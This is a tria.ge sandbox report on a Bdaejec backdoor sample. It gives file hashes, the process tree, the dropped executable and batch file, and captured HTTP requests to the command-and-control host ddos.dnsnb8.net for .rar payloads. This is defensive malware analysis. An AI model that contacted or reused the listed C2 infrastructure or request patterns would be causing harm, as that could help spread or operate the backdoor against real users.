Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

2025-01-07...mi.exe

windows7-x64

10

2025-01-07...mi.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/01/2025, 02:23 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-01-07_24b6cb4a4e74e31d75456cc3d43444da_mafia_wapomi.exe

  • Size

    1.6MB

  • MD5

    24b6cb4a4e74e31d75456cc3d43444da

  • SHA1

    682f244e75e459b5a483157b43138cb5b0379c33

  • SHA256

    eb15944ffc429eedfedaae8f6bf4f72ad0a77756ee45cd3e29d1e300d9b5a47e

  • SHA512

    b21d78466f2967c8f0a37b32173b8ab1c57d142d4e0d2a38073c749633dfdc99469a6263eccc4d08a70c9ed3180e9eb953479acf9ab0353565c38d0237226d28

  • SSDEEP

    49152:XE4XbjEKOh3SbiwJjn7gu5LUvdW9apuLvht/cionurM0EIMa1:Xrj834iwJjn7gu5LmMapuNiiMurM0

Score
10/10
bdaejecaspackv2backdoordiscovery

Malware Config

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

    backdoorbdaejec
  • Bdaejec family
    bdaejec
  • Detects Bdaejec Backdoor. 1 IoCs

    Bdaejec is backdoor written in C++.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-07_24b6cb4a4e74e31d75456cc3d43444da_mafia_wapomi.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-07_24b6cb4a4e74e31d75456cc3d43444da_mafia_wapomi.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1876
    • C:\Users\Admin\AppData\Local\Temp\LaPUbseA.exe
      C:\Users\Admin\AppData\Local\Temp\LaPUbseA.exe
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\2c3c764d.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2012

Network

  • flag-us
    DNS
    ddos.dnsnb8.net
    LaPUbseA.exe
    Remote address:
    8.8.8.8:53
    Request
    ddos.dnsnb8.net
    IN A
    Response
    ddos.dnsnb8.net
    IN A
    44.221.84.105
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    LaPUbseA.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k2.rar
    LaPUbseA.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k2.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k3.rar
    LaPUbseA.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k3.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k4.rar
    LaPUbseA.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k4.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k4.rar
    LaPUbseA.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k4.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    LaPUbseA.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    LaPUbseA.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    LaPUbseA.exe
    558 B
     256 B
     5
    6

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k2.rar
    http
    LaPUbseA.exe
    558 B
     256 B
     5
    6

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k2.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k3.rar
    http
    LaPUbseA.exe
    558 B
     256 B
     5
    6

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k3.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k4.rar
    http
    LaPUbseA.exe
    466 B
     176 B
     3
    4

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k4.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k4.rar
    http
    LaPUbseA.exe
    558 B
     256 B
     5
    6

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k4.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    LaPUbseA.exe
    466 B
     176 B
     3
    4

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    LaPUbseA.exe
    558 B
     256 B
     5
    6

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 8.8.8.8:53
    ddos.dnsnb8.net
    dns
    LaPUbseA.exe
    61 B
     77 B
     1
    1

    DNS Request

    ddos.dnsnb8.net

    DNS Response

    44.221.84.105

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WUBCGJ0A\k2[1].rar
    Filesize

    4B

    MD5

    d3b07384d113edec49eaa6238ad5ff00

    SHA1

    f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

    SHA256

    b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

    SHA512

    0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\2c3c764d.bat
    Filesize

    191B

    MD5

    d363695ea861a16fc6d0d0147d9cb2ae

    SHA1

    753168608561a12ef7d34f4a2259c3dbeb7e5426

    SHA256

    32f587cd094dc56b1719937146a8c3ff9effc1f9afa54d450ff510e0eef100c8

    SHA512

    19dcffe74ecb33ca6ba3fad96da058715cbf2532831f14d1474da2818d7910b6f76f3d8e2a4eaddf2ac0a377c42ce22c0c06bf51ddc1067e3540bfbf8eb96b89

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\4B063490.exe
    Filesize

    4B

    MD5

    20879c987e2f9a916e578386d499f629

    SHA1

    c7b33ddcc42361fdb847036fc07e880b81935d5d

    SHA256

    9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

    SHA512

    bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\LaPUbseA.exe
    Filesize

    15KB

    MD5

    56b2c3810dba2e939a8bb9fa36d3cf96

    SHA1

    99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

    SHA256

    4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

    SHA512

    27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

    Download Submit

  • memory/1876-0-0x00000000012F0000-0x000000000149B000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1876-10-0x0000000000190000-0x0000000000199000-memory.dmp

    Filesize

    36KB

    Download

  • memory/1876-9-0x0000000000190000-0x0000000000199000-memory.dmp

    Filesize

    36KB

    Download

  • memory/1876-16-0x00000000012F0000-0x000000000149B000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/2784-11-0x00000000001E0000-0x00000000001E9000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2784-56-0x00000000001E0000-0x00000000001E9000-memory.dmp

    Filesize

    36KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.